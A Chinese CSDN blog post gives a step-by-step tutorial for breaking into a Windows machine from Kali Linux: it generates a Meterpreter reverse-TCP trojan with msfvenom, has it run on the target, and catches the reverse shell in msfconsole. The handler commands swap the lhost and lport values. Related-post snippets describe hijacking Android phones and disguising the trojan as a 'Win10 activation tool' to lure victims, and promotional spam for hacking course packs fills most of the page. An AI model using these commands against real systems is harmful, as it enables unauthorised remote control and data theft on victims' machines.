如何使用kali来入侵(渗透)一台windows

于 2024-05-22 09:58:13 发布
阅读量585 收藏 15
点赞数 5
文章标签: windows 华为 网络 web安全 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz12345600354/article/details/139111052
版权

工具:一台带有kali linux系统的虚拟机,一个聪明的大脑

开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败

1.打开虚拟机,点击虚拟机

2.点击设置

3.点击网络适配器,看左边点击桥接模式,点击确定即可

好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?

1.打开虚拟机

2.打开终端,输入sudo su进入root用户权限

3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip

4.输入msfvenom -p windows/meterpreter/reverse_tcp lhost=“本机ip” lport=5000 -f exe
-o /root/payload.exe生成木马

显示以上信息表示生成成功,最后一行为木马路径,如果不是图片上的的显示信息,可能是写错了,检查一下

5.将木马程序从虚拟机中拖到靶机中

6.在终端中输入输入msfconsole

弹出以上信息表示打开成功

6.输入一下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 5000

set lport “本机ip”

然后输入exploit或者run开始远程监听

6.然后在靶机上双击打开木马exe程序,双以后可能靶机中没有任何的变化,但其实木马已经在运行并且已经在kali中反弹了shell,这表示我们已经成功的入侵了windows系统了

好啦,本期的教程就到这里了,大家在渗透的过程中有问题可以在下方留言,我会不定时的检查的哦

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,### 如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

如果你对网络安全感兴趣,学习资源免费分享,保证100%免费!!!(嘿客入门教程)

👉网安(嘿客)全套学习视频👈

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

img

👉网安(嘿客红蓝对抗)所有方向的学习路线****👈

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

img

学习资料工具包

压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

在这里插入图片描述

面试题资料

独家渠道收集京东、360、天融信等公司测试题!进大厂指日可待!
在这里插入图片描述

👉嘿客必备开发工具👈

工欲善其事必先利其器。学习客常用的开发软件都在这里了,给大家节省了很多时间。

这份完整版的网络安全(客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】

在这里插入图片描述

如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网安李李
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
渗透测试 — Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
最新发布
天下著书立传者,皆为我师
04-18 284
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络
渗透测试】kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
kali linux安全渗透教程
ITSM/ITIL/网络安全/IT运维
07-08 3929
第1章 Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷和技术缺陷。本章将简要介绍Linux安全渗透安全渗透工具的相关内容。其主要知识点如下: 什么是安全渗透安全渗透所需的工具; Kali Linux简介; 安装Kali Linux; Kali更新与升级; 基本设置。 1.1 什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1642
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
Kali Linux无线网络渗透测试教程(大学霸)
11-26
Kali Linux无线网络渗透测试教程(大学霸) Kali Linux无线网络渗透测试教程(大学霸) Kali Linux无线网络渗透测试教程(大学霸)
使用kali进行渗透测试--攻击实例:Windows 2008
lxy123_com的博客
02-04 5044
实验环境:Kali虚拟机一台、4G运行,Windows 2008靶机一台,IP地址192.168.22.138 实验目的:使用kaliWindows 2008进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss进行扫描 2,开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.138 使用nmap进行扫描 (二),进行渗透测试 扫描smb版本信息 msf6 > search s
网络安全kali渗透学习 web渗透入门 NAMP高级使用技巧和如何进行漏洞挖掘
xueshenlaila的博客
02-18 1417
nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。 nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。 这篇文章教大家使用NMAP的技巧和如何进行漏洞扫描 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公
一加8 pro 刷入 kali Hunter
MH8888的博客
10-23 6606
小伙伴在一加8pro刷 kali NetHunter 过程中踩了不少坑,在这里我总结一下刷成功的经验。在安装过程中呢,刷了几次机,由于手机最开始 是 ColorOS 12,Android12,所以要换成Android11 氢OS,咨询过大侠阿木,国内氢os 和国外氧os并无本质差别,所以刷氢os和氧os都可以。XDA论坛上的介绍说Android 12 应该也是可以的,应该需要自定义的ROM,我并没有研究,而是使用Android 11 氢OS 成功安装的。
Kali Linux 安全渗透教程<第一更>
大学霸__IT达人
05-29 4752
Kali Linux 安全渗透教程 目录 第1章  Linux安全渗透简介 1.1  什么是安全渗透 1.2  安全渗透所需工具 1.3  Kali Linux简介 1.4  安装Kali Linux 1.4.1  安装至硬盘 1.4.2  安装至USB驱动器 1.4.3  安装至VMware Workstation 1.4.4  安装WMware Tools 1.5  Ka
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
使用Kali Linux 侵入windows系统
liveJQ
03-13 8329
创建有效负载 要破解Windows,我们需要创建一个有效负载,作为我们进入该PC的后门。 比如有一位客户需要支付一笔费用委托货车司机运送一车石油,石油本身的重量、车子的 重量、司机的重量等等,这些都属于载重(load)。但是对于该客户来说,他关心的只有石 油的重量,所以石油的重量是有效载重(payload,也就是付费的重量)。 对于程序员来说就是在程序中 起关键作用的代码。 举一个最简单的例子,一...
大神教你如何渗透自己的电脑--just for fun
albertjone的博客
10-11 5181
转自:http://kansara744.blogspot.com/2015/06/hack-windows-pc-using-kali-linux.html HACK WINDOWS PC USING KALI LINUX   WHAT IS SOCIAL ENGINEERING TOOLKIT ? Social engineering toolk
kali如何渗透windows10
09-21
Kali渗透工具平台是一款基于Windows 10打造的工具平台,与Kali Linux并无关系。它是一个免费的工具平台,已经含有Windows 10的系统。下面是使用Kali渗透工具平台渗透Windows 10的流程: 1. 进入管理员模式。 2. 使用msfvenom命令生成一个恶意的可执行文件。命令示例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe。其中,本地ip是指你Kali的IP地址,可以使用ifconfig命令查看;本地端口是你自己设置的一个没有被占用的端口号;文件名可以根据你的喜好随意设置,比如可以写成"Win10激活工具",以吸引目标主机上钩。 3. 将生成的恶意可执行文件传输到目标主机上,可以使用一些常见的传输工具,如FTP、HTTP等。 4. 在目标主机上运行恶意可执行文件,这将与你的Kali系统建立一个反向连接。 5. 在Kali系统中使用msfconsole命令,通过反向连接获取目标主机的权限,进行进一步的渗透

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值